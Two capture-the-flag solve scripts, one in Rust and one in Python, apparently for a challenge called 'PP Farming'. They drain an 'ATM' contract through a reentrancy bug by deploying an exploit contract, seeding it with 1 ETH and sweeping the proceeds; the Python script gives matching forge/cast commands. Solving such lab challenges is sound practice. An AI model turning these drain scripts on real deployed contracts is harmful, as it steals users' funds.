File: ctf-writeups/blockchain_pp-farming/solve.rs
// PP Farming: reentrancy exploit.
// withdrawPP sends ETH before zeroing scores[msg.sender] (SWC-107).
// Exploit::attack seeds a score then reenters withdrawPP from receive()
// until the ATM is dry.
//
// deps: ethers = { version = "2", features = ["abigen"] }, tokio = { version = "1", features = ["full"] }, eyre = "0.6"

use ethers::prelude::*;
use ethers::utils::{format_ether, parse_ether};
use eyre::Result;
use std::sync::Arc;

abigen!(
    Exploit,
    r#"[constructor(address _target) function attack() external payable function drain(address to) external]"#
);

const RPC_URL: &str = "http://REPLACE_RPC";
const PLAYER_KEY: &str = "REPLACE_PRIVKEY";
const ATM_ADDR: &str = "REPLACE_ATM";

#[tokio::main]
async fn main() -> Result<()> {
    let provider = Provider::<Http>::try_from(RPC_URL)?;
    let wallet: LocalWallet = PLAYER_KEY.parse::<LocalWallet>()?.with_chain_id(1u64);
    let client = Arc::new(SignerMiddleware::new(provider, wallet.clone()));
    let atm: Address = ATM_ADDR.parse()?;

    println!("player  {:?}", wallet.address());
    println!("balance {} ETH", format_ether(client.get_balance(wallet.address(), None).await?));
    println!("atm bal {} ETH", format_ether(client.get_balance(atm, None).await?));

    let exploit = Exploit::deploy(client.clone(), atm)?.send().await?;
    println!("exploit deployed at {:?}", exploit.address());

    exploit.attack().value(parse_ether("1")?).send().await?.await?;
    exploit.drain(wallet.address()).send().await?.await?;

    println!("atm bal now {} ETH", format_ether(client.get_balance(atm, None).await?));
    Ok(())
}

File: ctf-writeups/blockchain_pp-farming/solve.py
#!/usr/bin/env python3
"""
PP Farming - Reentrancy exploit
withdrawPP does external call BEFORE zeroing scores[msg.sender]
"""
import sys
from web3 import Web3

# --- config: fill from challenge instance ---
RPC_URL    = "http://REPLACE_RPC"
PLAYER_KEY = "REPLACE_PRIVKEY"
ATM_ADDR   = Web3.to_checksum_address("REPLACE_ATM")

w3 = Web3(Web3.HTTPProvider(RPC_URL))
player = w3.eth.account.from_key(PLAYER_KEY)

print(f"Player:  {player.address}")
print(f"Balance: {w3.from_wei(w3.eth.get_balance(player.address), 'ether')} ETH")
print(f"ATM bal: {w3.from_wei(w3.eth.get_balance(ATM_ADDR), 'ether')} ETH")

# Compile with: forge build --root . from challenge dir, then grab bytecode
# Or use cast/forge deploy inline
print("\nDeploy Exploit.sol via forge script or cast, then call attack() with 1 ether seed.")
print("ATM has 10 ether; loop count=20 covers all re-entries needed to drain it.")
print("\nQuick forge commands:")
print(f"  forge create --rpc-url {RPC_URL} --private-key $PK src/Exploit.sol:Exploit --constructor-args {ATM_ADDR}")
print(f"  cast send $EXPLOIT 'attack()' --value 1ether --rpc-url {RPC_URL} --private-key $PK")
print(f"  cast send $EXPLOIT 'drain(address)' $PLAYER --rpc-url {RPC_URL} --private-key $PK")
print(f"  cast call {ATM_ADDR} 'isSolved()' --rpc-url {RPC_URL}")
